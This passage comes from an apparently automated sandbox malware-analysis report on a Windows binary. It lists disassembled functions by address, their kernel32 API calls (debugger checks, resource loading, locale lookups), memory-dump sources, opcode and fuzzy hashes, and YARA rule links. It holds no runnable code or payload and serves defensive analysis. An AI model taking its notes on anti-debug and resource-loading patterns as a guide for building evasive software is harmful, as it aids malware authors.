                                                                      • Opcode ID: f077b6419528d2fbc873addd0e380762da74d94b7af6f5fafb9bcd8af5d27a19
                                                                      • Instruction ID: 2620eacdd40fa0907a7369cb3eecacaeb1a18cf634d3e0ce19612996287a4c99
                                                                      • Opcode Fuzzy Hash: f077b6419528d2fbc873addd0e380762da74d94b7af6f5fafb9bcd8af5d27a19
                                                                      • Instruction Fuzzy Hash: E961B271B002279BDB249F29DC82BAAB7B8EF05741F50407AE905C6285E77CDA85CB58
                                                                      Function 0040C3B6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0040C4AE
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040C4B8
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C4C5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: e3befba03c12ef23e9378c6c73a8d2e1219170130844526728cb1fee504b06a5
                                                                      • Instruction ID: f59042ab01b4e68b088d44a4d7f18fa372e27b9989b10a9538d5778de61924f7
                                                                      • Opcode Fuzzy Hash: e3befba03c12ef23e9378c6c73a8d2e1219170130844526728cb1fee504b06a5
                                                                      • Instruction Fuzzy Hash: E531B374901218EBCB21DF65D98979DBBB8BF48314F5042EAE40CA6290EB749F858F49
                                                                      Function 003E1D70 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadResource.KERNEL32(00000000,00000000,755CD0F6,00000001,00000000,?,00000000,00429360,000000FF,?,003E1D1C,00000010,?,?,?,-00000010), ref: 003E1D9B
                                                                      • LockResource.KERNEL32(00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D,000000FF), ref: 003E1DA6
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D), ref: 003E1DB4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$LoadLockSizeof
                                                                      • String ID:
                                                                      • API String ID: 2853612939-0
                                                                      • Opcode ID: e724058fb3eeade87aa30517ae39ce44606e69b37e081b694fb1c380e9d31e82
                                                                      • Instruction ID: 258635882ffdd63e2d8eaaf14228a955332651bad355fae07ffd0e88a58d5b9d
                                                                      • Opcode Fuzzy Hash: e724058fb3eeade87aa30517ae39ce44606e69b37e081b694fb1c380e9d31e82
                                                                      • Instruction Fuzzy Hash: 0611E732E006A49BC7319F1ADC45B77F7ECE789721F414A3BEC16D3680E6359C008694
                                                                      Function 004138A0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
                                                                      • Instruction ID: 1961801496492b7ebe5945b3a4ec5d3ae7c9d132c5d6fa54a2e3cf2bc7c7968d
                                                                      • Opcode Fuzzy Hash: 55ed78c7c429dff4e87f4ebae4af2bdfb9d68bf7abf48bfa11f875b6aae70124
                                                                      • Instruction Fuzzy Hash: 68F13F71E002199FDF14CF69D9806EEB7B1FF48325F15826AE819AB381D734AE41CB94
                                                                      Function 0041D192 Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041D5D7,00000000,00000000,00000000), ref: 0041D496
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 565725191-0
                                                                      • Opcode ID: 89bacc5ecc7f7e3998dac0c8555017ac45e188fb85b99d4f9eb3338708704a19
                                                                      • Instruction ID: fdc027bd06bcbd54904b3abf90f52be857aa01afa64e9a3a56c8e496062e00f9
                                                                      • Opcode Fuzzy Hash: 89bacc5ecc7f7e3998dac0c8555017ac45e188fb85b99d4f9eb3338708704a19
                                                                      • Instruction Fuzzy Hash: 8BC126B2D00115ABCB10AF65CC42AEF7BB9EF05714F54406BF911E7281E7389E81C798
                                                                      Function 0041DB30 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041DB2B,?,?,00000008,?,?,00426AD4,00000000), ref: 0041DD5D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 1bb97e3957e2903a3c5cd9692ef56cf25f24f3d88f96ed5d2da283853249e19d
                                                                      • Instruction ID: bebcde29126cd576ef614f8ccfa7dba1328ca2715c5340bd9ef9bf446f424ed8
                                                                      • Opcode Fuzzy Hash: 1bb97e3957e2903a3c5cd9692ef56cf25f24f3d88f96ed5d2da283853249e19d
                                                                      • Instruction Fuzzy Hash: 41B16EB1A10604CFD719CF28C486BA57BE0FF45364F258659E89ACF3A1C339E992CB44
                                                                      Function 0040801C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00408032
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor
                                                                      • String ID:
                                                                      • API String ID: 2325560087-0
                                                                      • Opcode ID: baaa148e2a1b8637ea88dd1e116cea6844d43bb647f93d3329dfb68abafd829e
                                                                      • Instruction ID: 3903050a971ede421773157683281aede0350435f19169cc4ffaa37b003dfa97
                                                                      • Opcode Fuzzy Hash: baaa148e2a1b8637ea88dd1e116cea6844d43bb647f93d3329dfb68abafd829e
                                                                      • Instruction Fuzzy Hash: 54517BB5A10215CBEB14CFA5DA917AABBF0FB88711F25803AC441EB390D7799A01CF58
                                                                      Function 0040FA8E Relevance: 1.6, Strings: 1, Instructions: 388COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: c6165c58a3032d91a36f0eb118873c4f60a0d0fde27e7c4dcefc074417a47c92
                                                                      • Instruction ID: 694636140906c0f5e51b72a101a3e94a4aa94d5ab2bedfc62a35a3018ca405f7
                                                                      • Opcode Fuzzy Hash: c6165c58a3032d91a36f0eb118873c4f60a0d0fde27e7c4dcefc074417a47c92
                                                                      • Instruction Fuzzy Hash: EEE19C306006058FCB34CF68C5806ABB7B1BF49314B24467ED55AABBD1D738AD8ACF59
                                                                      Function 004205E9 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ac23a62b4e56d5b2529fbc9ad41b18e15b928cbb96286b6154594dea9f1ab28e
                                                                      • Instruction ID: bc2cf16628dbe75c5cb18f8d68d38ad3aad01140fa14e74c002eea05375eb0b4
                                                                      • Opcode Fuzzy Hash: ac23a62b4e56d5b2529fbc9ad41b18e15b928cbb96286b6154594dea9f1ab28e
                                                                      • Instruction Fuzzy Hash: CC310676A00228AFDB20DFB9DCC4DBBB7ADEB84314F54425AF80593241EA34AD408B58
                                                                      Function 0040F700 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: c71368de4e2841f25d96850d0bb195db2c8b3aeaa940b41e6d5a4d72d7bdd1af
                                                                      • Instruction ID: 495ec7104d245fcf75fc4a99936de9ef2d8ae54f4491ad7ef7b80475062bd1c8
                                                                      • Opcode Fuzzy Hash: c71368de4e2841f25d96850d0bb195db2c8b3aeaa940b41e6d5a4d72d7bdd1af
                                                                      • Instruction Fuzzy Hash: 5AC19E70A006068FCB34DF68C480ABBB7A1AF45314F14463FD856A7BD1D778AD4ACB5A
                                                                      Function 00423A7A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00423ACE
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: 7bc0ee1795af7c061082b53edf5d6b5c58d3b37841e295031198e4d66c3a847a
                                                                      • Instruction ID: 1d4edc0f7cc85a0eefa3f1049b566559421cd0d58235f3da3da0fc7b7b9d5545
                                                                      • Opcode Fuzzy Hash: 7bc0ee1795af7c061082b53edf5d6b5c58d3b37841e295031198e4d66c3a847a
                                                                      • Instruction Fuzzy Hash: 1421C731701266ABDB189E16DC42EBB77B8EF04715B50007FF901D6242EA7CEE418758
                                                                      Function 00423701 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • EnumSystemLocalesW.KERNEL32(00423827,00000001,00000000,?,-00000050,?,00423E58,00000000,?,?,?,00000055,?), ref: 00423773
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: 1ba9a599a62f8248dd708a43e43b9b095246be8544c7f4112d8a4d24972550a1
                                                                      • Instruction ID: eecd6c2ca59c2cc2d97f5e72b50bbf1e4de73ba60aab12fb8c2296aab00ead0c
                                                                      • Opcode Fuzzy Hash: 1ba9a599a62f8248dd708a43e43b9b095246be8544c7f4112d8a4d24972550a1
                                                                      • Instruction Fuzzy Hash: 3311067A3003015FDF18AF39D8915BAB7A1FF80319B54842DE58687B40D779A942C744
                                                                      Function 00423CA9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00423A43,00000000,00000000,?), ref: 00423CD5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 3736152602-0
                                                                      • Opcode ID: a5e8a6a21838863aedf798e891e7909ebbe76be076fef209f881baa9a906cbd2
                                                                      • Instruction ID: e43d108d74d5de9ab12eb5cdc00dda9a408390cd8c9540dfb3c6596c5468d332
                                                                      • Opcode Fuzzy Hash: a5e8a6a21838863aedf798e891e7909ebbe76be076fef209f881baa9a906cbd2
                                                                      • Instruction Fuzzy Hash: 0CF0F9327101217BDB245F25EC06BBB7774EB80755F54442AEC46A3240DA7CFF42C698
                                                                      Function 0042379C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • EnumSystemLocalesW.KERNEL32(00423A7A,00000001,?,?,-00000050,?,00423E1C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004237E6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: db568e506ce5864a79fcae0c26fd302740bf233124cc15e088feaa57bf57b2b2
                                                                      • Instruction ID: 662bf13dfdc1097d413deafc3dc1c218f053f99cc9c24ade101017b12ad9a9d5
                                                                      • Opcode Fuzzy Hash: db568e506ce5864a79fcae0c26fd302740bf233124cc15e088feaa57bf57b2b2
                                                                      • Instruction Fuzzy Hash: 45F028B63003045FDB149F39A881A7B7BA1FFC0358B54802EF94587A40D6B99D028604
                                                                      Function 0041C7A2 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004172CA: EnterCriticalSection.KERNEL32(?,?,0042163A,00000000,004411A8,0000000C,00421601,?,?,0041C75E,?,?,0041AFDA,00000001,00000364,?), ref: 004172D9
                                                                      • EnumSystemLocalesW.KERNEL32(0041C795,00000001,004410C8,0000000C,0041CBC4,00000000), ref: 0041C7DA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                      • String ID:
                                                                      • API String ID: 1272433827-0
                                                                      • Opcode ID: 08854aaee2c85e14520ff5749bb74ad9414cf6d0f074ddbe655a6b27159cbab8
                                                                      • Instruction ID: 2aff5c87d2e1f47609c46464756907b167827dcc76e8be531a13019df8d2861c
                                                                      • Opcode Fuzzy Hash: 08854aaee2c85e14520ff5749bb74ad9414cf6d0f074ddbe655a6b27159cbab8
                                                                      • Instruction Fuzzy Hash: B3F03C76A40604EFD710EF58E842B9D77F0FB09725F20416BF4109B2A1DB7949848F48
                                                                      Function 004071C1 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00404EEC,00000000,0043B6C9,00000004,00403D92,0043B6C9,00000004,004041A5,00000000,00000000), ref: 004071DA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 2a977141dbe8eabc822da48366f6ebbf5fd0663cccfbde867b69ba2db6ad93a2
                                                                      • Instruction ID: 396f290ad7189e7b3697af71bb85d87f49c9823eed498697b4849688c2a10cc6
                                                                      • Opcode Fuzzy Hash: 2a977141dbe8eabc822da48366f6ebbf5fd0663cccfbde867b69ba2db6ad93a2
                                                                      • Instruction Fuzzy Hash: 6CE0D172A58104B6D7159BBC9D1FF6B36E8D704709F504156F103F92C1C678DA01E15A
                                                                      Function 004236B6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0041AE3C: GetLastError.KERNEL32(?,00000008,004203BC), ref: 0041AE40
                                                                        • Part of subcall function 0041AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 0041AEE2
                                                                      • EnumSystemLocalesW.KERNEL32(0042360F,00000001,?,?,?,00423E7A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004236ED
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2417226690-0
                                                                      • Opcode ID: fd398aa86cbff818c0e05eab00ca5c877d3aaf3042fda12b64d32b89ed820614
                                                                      • Instruction ID: 7326562db07ec836f1383128ae8d0bf059db6235a19938b15973d7c02eb557e5
                                                                      • Opcode Fuzzy Hash: fd398aa86cbff818c0e05eab00ca5c877d3aaf3042fda12b64d32b89ed820614
                                                                      • Instruction Fuzzy Hash: 69F0553630030967CB24AF3AE80667A7FA8EFC1711B86006AEA09CB350C279D943C758
                                                                      Function 0041CD1F Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041A4B1,?,20001004,00000000,00000002,?,?,00419AB3), ref: 0041CD53
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: 993213dab89549fd462f7762d937425c7af20179551cb4dd8dcd48253b853b5d
                                                                      • Instruction ID: b498b8ec66d7c41fa0aba70d57ca67a6df150d87393759233cdfba895d7d5bb4
                                                                      • Opcode Fuzzy Hash: 993213dab89549fd462f7762d937425c7af20179551cb4dd8dcd48253b853b5d
                                                                      • Instruction Fuzzy Hash: 34E04F35581218BBCF122F61EC45AEE7F26EF44751F004036FD0566221CB358962AAE9
                                                                      Function 00408553 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
